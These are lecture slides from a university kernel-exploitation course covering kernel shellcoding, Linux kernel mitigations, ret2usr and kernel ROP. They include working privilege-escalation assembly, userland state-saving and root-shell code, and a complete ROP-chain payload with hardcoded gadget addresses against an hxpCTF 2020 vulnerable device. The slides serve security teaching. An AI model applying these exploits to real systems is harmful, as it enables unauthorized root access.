ENPM809V
Kernel Hacking Part 1
What we will cover
- Overview
- Introduction to Kernel Shellcoding
- Kernel Software Mitigations
- Ret2User
Overview
What's so special about kernel hacking?
- It's hacking another implementation
- APIs are different in the kernel
- Heap allocators are different
- New attack spaces
- Greater introspection
How powerful is a kernel exploit
- It can be pretty powerful!
- Harder to catch successful exploits
- Have more granular control of the system
- Access to privileged features
- Greater amounts of stealth
- With great power comes great responsibility!
- Easier to break the system if something goes wrong
- Can't let the kernel SEGFAULT
- Can cause the system to crash
So why learn it?
- Knowing how userspace software is vulnerable is half of the battle
- Gives us greater understanding of how the system works
- Understand why the security measures we have are in place
What we will cover?
- Introduction to Kernel Stack Based Vulnerabilities
- Introduction to Heap-Based Vulnerabilities in the Kernel
- Privilege escalation and sandbox esacpes.
- The kernel is too big to go over everything
Kernel Shellcoding
Review of Userspace Shellcoding
- Userspace shellcode generally (but not all the time) execute the syscalls
- Sometimes we can load other userspace functions and execute them.
- This will not work in kernel space!
- We don't do syscalls there.
.global _start
.intel_syntax noprefix
_start:
// fd = open("/flag", O_RDONLY);
lea rdi, [rip+flag]
mov rsi, 0
mov rax, 2
syscall
// bytes_read = read(fd, buf, 100);
mov rdi, rax
mov rsi, rsp
mov rdx, 100
mov rax, 0
syscall
// write(stdout, buf, bytes_flag);
mov rdi, 1
mov rsi, rsp
mov rdx, rax
mov rax, 1
syscall
// exit(42)
mov rax, 60
mov rdi, 42
syscall
flag:
.ascii "/flag\0"
Review of Userspace Shellcoding
- Remember: syscalls are an interface for userspace to talk to kernel space
- We are already in the kernel space when doing kernel shellcoding
- When calling syscall, we immediately jump to the syscall_entry function in the kernel
- It assumes that it's being called from userspace! Don't call it from kernel space.
What to do instead?
- Act like the kernel! Use kernel API's instead!
- Remember
commit_creds(prepare_kernel_creds(0))?
-
What about
current_task_struct->thread_info.flags &= ~(1 << TIF_SECCOMP)
-
What do you think
run_cmd("/path/to/command")
does?
- Remember
- All of these require access to the current_task, access to the task's respective members, the right kernel API
- Sounds easy right?
What to do instead?
- Act like the kernel! Use kernel API's instead!
- Remember
commit_creds(prepare_kernel_creds(0))?
What about
current_task_struct->thread_info.flags &= ~(1 << TIF_SECCOMP)
What do you think
run_cmd("/path/to/command")
does?
- Remember
- All of these require access to the current_task, access to the task's respective members, the right kernel API
- Sounds easy right?
- Sounds easy right?
But how do we get them?
- Act like the kernel! Use kernel API's instead!
- Remember
commit_creds(prepare_kernel_creds(0))?
What about
current_task_struct->thread_info.flags &= ~(1 << TIF_SECCOMP)
What do you think
run_cmd("/path/to/command")
does?
- Remember
- All of these require access to the current_task, access to the task's respective members, the right kernel API
- Sounds easy right?
- Sounds easy right?
How can I call the Kernel API?
- No KASLR?
- As simple as /proc/kallsysms - gives us the address of every function
- Some systems you might even need root to access /proc/kallsysms
- KASLR?
- A little bit more complicated.
- Need to leak a kernel address and calculate the offset (similar to userspace ASLR)
For APIs requiring the current_task
- For most kernel modules, we can just read the current task from the gs segment register
- Can't do this in shellcode. Why?
- Current is the same as reading from the gs segment register.
- Do this instead in your shellcode
- What shellcode might need the current_task structure?
- SECCOMP escape!
Finding Offsets within current_task
- Don't do this manually. It is really really challenging.
- You might see some structs have
} __randomize_layout;
- You might see some structs have
-
What do you do instead?
-
Write a kernel module in C with the actions you want your shellcode to do.
-
Build it for the kernel you want to attack (e.g., using the vm build command in pwn.college).
-
Reverse-engineer it to see how these actions work in assembly.
-
Re-implement that assembly in your shellcode!
-
When you're done...
- Don't let the code segfault!
- Userspace this is okay, but with kernel, bad things can happen.
- Much more serious repercussions
- Make sure to cleanup properly and return.
- Userspace this is okay, but with kernel, bad things can happen.
- Example: If you hijacked a function pointer, act like a function and clean up!
Tips for Debugging...
- To debug the userspace component:
- Just attach GDB to it. On pwn.college, do this within the VM (vm connect)
- You won't know what is happening in the kernel
- To debug the kernel component:
- Attach to kgdb or on pwn.college, execute vm debug.
- What this does is attach to QEMU itself.
- Harder to debug userspace component
- Only way to debug kernel component itself.
- On pwn.college, might want to step through the syscall instruction itself.
- Attach to kgdb or on pwn.college, execute vm debug.
Kernel Mitigations
Review of Userspace Mitigations
- Software Mitigations
- ASLR
- PIC/PIE
- RELRO
- Canaries
- And more...
KASLR
- Kernel Address Space Layout Randomization
- Enabled at system boot time
- Randomizes the base address every time the system is booted
- This can be modified via a configuration
FG-KASLR
- Fine-Grained KASLR
- Enabled at system boot time
- Randomizes the .text section in finer granularity.
- Per Function basis.
- Adjusting based off of offsets isn't enough anymore
- Still imperfect
Kernel Stack Cannaries
- Exactly the same as userspace stack canaries
- Enabled at compilation time, can't be turned off afterwards
Supervisor Mode Execution Protection
- Prevents execution of code in userspace in the kernel
- Enabled by the 20th bit in the CR4 (Control) Register
- When enabled, invalidates pages that are known to be in userspace to prevent execution
- There is a bit in the page's metadata where it indicates 1=user and 0=supervisor/kernel
- When this is enabled, executing shellcode from userspace is significantly more difficult.
Supervisor Mode Access Protection
- Prevents the kernel from accessing userspace pages
- Enabled by the 21st bit in the CR4 (Control) Register
- This is part of the reason why we have copy_to_user and copy_from_user
- Kernel cannot read or write to userspace pages as well.
- This prevents things like storing ROPs in userspace that will be executed in the kernel
Kernel Page Table Isolation
- When enabled, completely separates kernel page tables from user page tables
- Kernel has both userspace and kernel space pages in its page table
- Userspace doesn't have any kernel pages in its page table.
Randomized Offsets
- Randomizes offsets of certain structures per compilation
- Prevents easily reproducible shellcode for kernel exploits
- E.g. accessing mmap is always at a different offset; thus, must modify shellcode to understand this.
- Prevents exploits from being widespread.
- Prevents easily reproducible shellcode for kernel exploits
ret2usr
What is ret2usr
- Ret2usr is essentially the ret2shellcode for kernel space!
- We have a buffer overflow in the kernel, and we do not have SMEP and SMAP enabled.
- We store kernel shellcode somewhere in the userspace part of the process
- That shellcode is going to give us one of the following:
- Privilege escalation
- Escape some sort of sandbox
- Both? Something else?
What are the caveats?
- We might have KASLR and Stack Canaries!
- We need to return to the userspace part of the process somehow
- We can't just create a shell/get the flag necessarily
- Need to jump back to userspace to do this
- Need to ensure that we cleanup properly as well! Might help with the previous step.
Lets say we are our goal is to get a root shell via a vulnerable kernel character device
How can we might tell?
//From hxpCTF 2020
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
//...
int tmp[32];
//...
if ( _size > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
BUG();
}
_check_object_size(hackme_buf, _size, 0LL);
if ( copy_from_user(hackme_buf, data, v5) )
return -14LL;
_memcpy(tmp, hackme_buf);
//...
}
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
//...
int tmp[32];
//...
_memcpy(hackme_buf, tmp);
if ( _size > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
BUG();
}
_check_object_size(hackme_buf, _size, 1LL);
v6 = copy_to_user(data, hackme_buf, _size) == 0;
//...
}
What if we have some mitigations?
- Stack Canaries
- The character device lets us do arbitrary reads. This makes it a bit easier for us.
- KASLR
- We will need to find the address to the kernel function that we want.
- Since we only care about one version of the Linux kernel, we will build our own kernel module and get the address that way
- We will print out the reference to the function that we want
- If KASLR is disabled, we can just get the address from /proc/kallsyms
Getting an Address We Want
// Assume this is part of a Linux Kernel Module
void leak_func()
{
void *someFunc = NULL;
someFunc = (void *)&prepare_kernel_cred;
printk(KERN_ALERT "prepare_kernel_cred = %p", someFunc);
someFunc = (void *)&commit_creds;
printk(KERN_ALERT "commit_creds = %p", someFunc);
}
Kernel Privilege Escalation Example
movabs rax, <addr_to_prepare_kernel_cred>; //This will look something like 0xffffffff814c67f0
xor rdi, rdi; //Why do we want to do this
call rax;
mov rdi, rax;
movabs rax, <addr_to_commit_creds>;
call rax;
Keep in mind that this only makes the process root!
Returning to Userland
- What we have before only makes our process root, but not necessarily giving us a root shell
- We need to utilize either sysretq or iretq to return to userland
- sysretq is a little more complicated than iretq
- iretq requires 5 userland registers setup: RIP, CS, RFLAGS, SP, and SS
- We want to make sure that RIP points to the function in usermode that brings up a shell.
- What are the steps?
Step 1: Save Usermode State
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}
/* If you want to do this in pwntools, you need to save it somewhere that's not a variable */
Step 2: Create our Root Shell
void get_shell(void)
{
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}
What are the necessary steps?
- Have your userspace component ready! (shell, etc.)
- Save userspace state
- Connect to kernel space somehow (character device, proc device, etc).
- If necessary, leak the stack canary
- Perform your kernel exploit
- If successful, you will then have a root shell!
Step 3: Exploit!
unsigned long user_rip = (unsigned long)get_shell;
void escalate_privs(void){
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;" //Setting prepare_kernel_cred param to 0
"call rax;"
"mov rdi, rax;" //Store the return value as the first parameter for commit_cred
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;" //Now we are resetting user state.
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
Kernel ROP
Why Kernel ROP
- Remember how we talked about SMEP?
- This is basically kernel version of NX.
- We can't just execute shellcode that is from userspace
- We will need to find gadgets within the kernel to achieve what we are looking for.
- We will loosly go over SMAP and KPTI
Building the ROP Chain
- This will be the same as kernel shellcode
- ROP into prepare_kernel_creds(0)
- Set the return value as the first parameter via a gadget
- ROP into commit_creds
- ROP into swapgs; ret
- Setup RIP/CS/RFLAGS/SP/SS registers
- ROP into iretq
What tools can we use to find the gadgets?
- ROPGadget!
- We can do this on the kernel module or other parts of kernel code that the module has access to
- Something different about userspace:
- We might have to do some trial and error - some gadgets may be present but won't work due to the memory.
What this looks like in the end
// Source: https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
unsigned long user_rip = (unsigned long)get_shell;
unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx ; ret
unsigned long cmp_rdx_jne_pop2_ret = 0xffffffff81964cc4; // cmp rdx, 8 ; jne 0xffffffff81964cbb ; pop rbx ; pop rbp ; ret
unsigned long mov_rdi_rax_jne_pop2_ret = 0xffffffff8166fea3; // mov rdi, rax ; jne 0xffffffff8166fe7a ; pop rbx ; pop rbp ; ret
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs ; pop rbp ; ret
unsigned long iretq = 0xffffffff8100c0d9;
void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0x0; // rdi <- 0
payload[off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
payload[off++] = pop_rdx_ret;
payload[off++] = 0x8; // rdx <- 8
payload[off++] = cmp_rdx_jne_pop2_ret; // make sure JNE doesn't branch
payload[off++] = 0x0; // dummy rbx
payload[off++] = 0x0; // dummy rbp
payload[off++] = mov_rdi_rax_jne_pop2_ret; // rdi <- rax
payload[off++] = 0x0; // dummy rbx
payload[off++] = 0x0; // dummy rbp
payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
payload[off++] = swapgs_pop1_ret; // swapgs
payload[off++] = 0x0; // dummy rbp
payload[off++] = iretq; // iretq frame
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;
puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));
puts("[!] Should never be reached");
}
Stack Pivoting
- Sometimes the kernel stack is not big enough to hold our ROP chain.
- We can pivot over to the userland portion of the stack to be able to hold the ROP Chain
- This is a user controlled portion of memory, and modifying the RSP register to make it think it's still in kernel space.
mov esp, <addr>;
//some additional instructions potentially
ret;
What this looks like?
void build_fake_stack(void){
fake_stack = mmap((void *)0x5b000000 - 0x1000, 0x2000,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
unsigned off = 0x1000 / 8;
fake_stack[0] = 0xdead; // put something in the first page to prevent fault
fake_stack[off++] = 0x0; // dummy r12
fake_stack[off++] = 0x0; // dummy rbp
fake_stack[off++] = pop_rdi_ret;
... // the rest of the chain is the same as the last payload
}
// Source - https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
References
- https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/#the-simplest-exploit---ret2usr
- https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
Kernel Hacking Part 1
By Ragnar Security
Kernel Hacking Part 1
- 104